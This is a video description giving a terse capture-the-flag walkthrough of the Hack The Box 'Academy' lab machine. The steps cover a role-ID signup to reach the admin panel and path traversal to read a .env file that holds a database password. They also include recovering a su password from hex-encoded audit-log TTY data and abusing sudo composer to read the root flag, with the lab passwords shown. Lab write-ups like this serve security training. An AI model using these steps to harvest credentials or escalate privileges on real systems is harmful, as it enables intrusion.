This video demonstrates how to root the htb medium difficulty box named academy. Academy is a machine designed for beginners to intermediate level hackers.
Mini Writeup
signup with roleid =1 and login to /admin.php
[ Ссылка ]
cat ../../academy/.env
DB_pasword : mySup3rP4s5w0rd!!
su cry0l1t3
mySup3rP4s5w0rd!!
cat user.txt
[+] Checking for TTY (sudo/su) passwords in audit logs
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
hex decoding the data value
mrb3n
mrb3n_Ac@d3my!
it can run composer as sudo
_____________
create composer.json
echo '{"scripts":{"x":"cat /root/root.txt"}}'
sudo composer run-script x
Academy - Hack The Box (Walkthrough)
Теги
CTFHTBHack the Boxsolvedsolvehacksolutionflagchallengewalkthroughlearnengineeringreverse engineeringanswerwriteupwalk-throughhtb writeuphtb walkthrougheasyboxrootroot boxhack the box walkthroughhack the box tutorialtutorialhack the box active machine walkthroughactivemachinehack the box beginner machineshack the box ctfhack the box challenge walkthroughacademyacademy solutionacademy writeupacadmyhackingsecurityvulnhuboscposcp-like
![Фонарик станет вечным! Добавь в него эту схему не пожалеешь! [Компанец Д А]](https://i.ytimg.com/vi/nrpo0ic_fds/mqdefault.jpg)
